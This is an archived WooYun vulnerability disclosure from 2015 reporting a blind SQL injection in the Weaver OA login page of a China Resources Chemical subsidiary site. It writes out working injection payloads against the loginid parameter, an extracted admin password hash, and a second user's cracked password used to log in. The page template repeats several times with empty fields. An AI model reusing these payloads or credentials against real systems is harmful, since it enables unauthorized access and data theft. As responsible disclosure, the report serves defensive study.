华润化工控股有限公司某分站存在SQL 注入漏洞，泄漏大量信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134901

漏洞标题：华润化工控股有限公司某分站存在SQL 注入漏洞，泄漏大量信息

漏洞作者：浮萍

提交时间：2015-08-18 12:45

修复时间：2015-10-02 13:00

公开时间：2015-10-02 13:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-18：细节已通知厂商并且等待厂商处理中
2015-08-18：厂商已经确认，细节仅向厂商公开
2015-08-28：细节向核心白帽子及相关领域专家公开
2015-09-07：细节向普通白帽子公开
2015-09-17：细节向实习白帽子公开
2015-10-02：细节向公众公开

简要描述：

SQL注入

详细说明：

采用的泛微系统
http://eip.crcchem.com:89/login.do
存在sql注入
当输入任意用户名密码时
会提示用户未找到

当输入存在的用户名时
会提示登录密码不正确

用户名输入sysadmin'and'1'='1时返回密码不正确

loginid=sysadmin' and length(password)=32 and'1'='1&password=z&authcode=&dynapass=&tokenpass=&clienttype=Webclient&clientver=4.5&language=&country=&verify=&needdyna=

密码加密后的长度为32位
猜解密码

loginid=sysadmin' and ascii(substr(password,1,1))=56 and'1'='1&password=z&authcode=&dynapass=&tokenpass=&clienttype=Webclient&clientver=4.5&language=&country=&verify=&needdyna=

可猜解出来第一位对应的ascii为56 即为8

可猜解出sysadmin对应的密码

sysadmin密码为

8D5E057546204DEC90D32839683E1DB3

未解密成功

漏洞证明：

再获取一个用户

loginid=a' or  length(loginid) =2 and'1'='1&password=z&authcode=&dynapass=&tokenpass=&clienttype=Webclient&clientver=4.5&language=&country=&verify=&needdyna=

说明存在长度为2的用户

loginid=a'or length(loginid)=2 and ascii(substr(loginid,1,1)) =102 and '1'='1&password=z&authcode=&dynapass=&tokenpass=&clienttype=Webclient&clientver=4.5&language=&country=&verify=&needdyna=
loginid=a'or length(loginid)=2 and ascii(substr(loginid,1,1)) =102  and ascii(substr(loginid,2,1)) =119 and  '1'='1&password=z&authcode=&dynapass=&tokenpass=&clienttype=Webclient&clientver=4.5&language=&country=&verify=&needdyna=

该对应的用户为fw
然后使用脚本
跑出密码

fw对应密码为96E79218965EB72C92A549DD5A330112
解密后为111111
登录

登录后应该也存在sql注入
这里不测试了
然后也可以登录http://eip.crcchem.com/login/Login.jsp?logintype=1

通讯录

其他信息就不查看了

修复方案：

版权声明：转载请注明来源浮萍@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-08-18 12:59

厂商回复：

很细心，满分，换我很可能忽略过去了，不过审代码应该会再审出来，已通知化工

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134901

漏洞标题：华润化工控股有限公司某分站存在SQL 注入漏洞，泄漏大量信息

相关厂商：华润化工控股有限公司

漏洞作者：浮萍

提交时间：2015-08-18 12:45

修复时间：2015-10-02 13:00

公开时间：2015-10-02 13:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源浮萍@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134901

漏洞标题：华润化工控股有限公司某分站存在SQL 注入漏洞，泄漏大量信息

相关厂商：华润化工控股有限公司

漏洞作者： 浮萍

提交时间：2015-08-18 12:45

修复时间：2015-10-02 13:00

公开时间：2015-10-02 13:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0134901"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 浮萍@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：浮萍

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源浮萍@乌云